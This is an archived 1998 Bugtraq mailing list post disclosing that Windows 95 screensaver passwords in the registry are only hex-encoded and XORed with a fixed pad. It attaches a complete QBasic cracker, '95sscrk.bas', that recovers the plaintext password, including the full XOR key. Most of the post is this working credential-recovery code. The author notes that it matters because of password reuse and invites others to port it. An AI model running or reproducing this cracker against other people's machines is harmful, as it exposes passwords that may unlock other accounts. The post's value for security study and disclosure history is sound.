Bugtraq mailing list archives

Windows95/98(?) Screensavers

From: kmspill_km () INAME COM (CrazyLinux)
Date: Tue, 26 May 1998 23:31:47 +0200


This is a multi-part message in MIME format.
--------------D64CF242C878C90431979B38
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

I got the idea to explore a bit on the w95ss password in the registry
after seeing the bruteforce cracker (using tables of bytes).

(why this is important to bugtraq? loads of people use 1 password for
everything)

It's kinda simple. First hex-decode the bytes (like in WSFTP) then XOR
them with a pad. A basic prog follows (I was too lazy to get C off the
CD).

-cp


Feel free to recode it in C and post to the list.
--------------D64CF242C878C90431979B38
Content-Type: text/plain; charset=us-ascii; name="95sscrk.bas"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="95sscrk.bas"

DECLARE FUNCTION DecryptByte! (bytes!, ya!)
DECLARE FUNCTION HexVal! (coder$)
DIM SHARED byte(16) AS INTEGER

CLS
PRINT "Crazydog's w95 screensaver cracker, basic version"
INPUT "Input char part of ScreenSave_Data(from registry):", code$

z = LEN(code$): IF z MOD 2 <> 0 THEN PRINT "Must be even # of chars!": END

ON ERROR GOTO 40

FOR y = 1 TO z STEP 2
balon = balon + 1
nibbleone$ = MID$(code$, y, 1): nibbletwo$ = MID$(code$, y + 1, 1)
mega = (HexVal(nibbleone$) * 16) + HexVal(nibbletwo$)
IF HexVal(nibbletwo$) < 0 THEN mega = -255  ' one if only.
IF mega < 0 THEN PRINT "That didn't make any sense.": END
byte(y) = DecryptByte(mega, balon):
wilma$ = wilma$ + CHR$(byte(y))
NEXT y

PRINT "The code is: "; wilma$; " (case insensitive)"
END
40 PRINT "[unknown]": END

FUNCTION DecryptByte (bytes, ya)
DIM xorpattern(31) AS INTEGER
xorpattern(1) = &H48: xorpattern(2) = &HEE: xorpattern(3) = &H76
xorpattern(4) = &H1D: xorpattern(5) = &H67: xorpattern(6) = &H69
xorpattern(7) = &HA1: xorpattern(8) = &H1B: xorpattern(9) = &H7A
xorpattern(10) = &H8C: xorpattern(11) = &H47: xorpattern(12) = &HF8
xorpattern(13) = &H54: xorpattern(14) = &H95: xorpattern(15) = &H97
xorpattern(16) = &H5F
DecryptByte = bytes XOR xorpattern(ya)
END FUNCTION

FUNCTION HexVal (coder$)
coder$ = UCASE$(coder$)
SELECT CASE coder$
 CASE "0"
 whee = 0
 CASE "1"
 whee = 1
 CASE "2"
 whee = 2
 CASE "3"
 whee = 3
 CASE "4"
 whee = 4
 CASE "5"
 whee = 5
 CASE "6"
 whee = 6
 CASE "7"
 whee = 7
 CASE "8"
 whee = 8
 CASE "9"
 whee = 9
 CASE "A"
 whee = 10
 CASE "B"
 whee = 11
 CASE "C"
 whee = 12
 CASE "D"
 whee = 13
 CASE "E"
 whee = 14
 CASE "F"
 whee = 15
 CASE ELSE
 whee = -21
END SELECT

HexVal = whee

END FUNCTION


--------------D64CF242C878C90431979B38--

Current thread:

Re: Exploit: Windows95/98/ (NT?) Autorun Aleph One (May 26)
- Re: Exploit: Windows95/98/ (NT?) Autorun Adam Shostack (May 26)
- Windows95/98(?) Screensavers CrazyLinux (May 26)
- <Possible follow-ups>
- Re: Exploit: Windows95/98/ (NT?) Autorun Christian Groessler (May 28)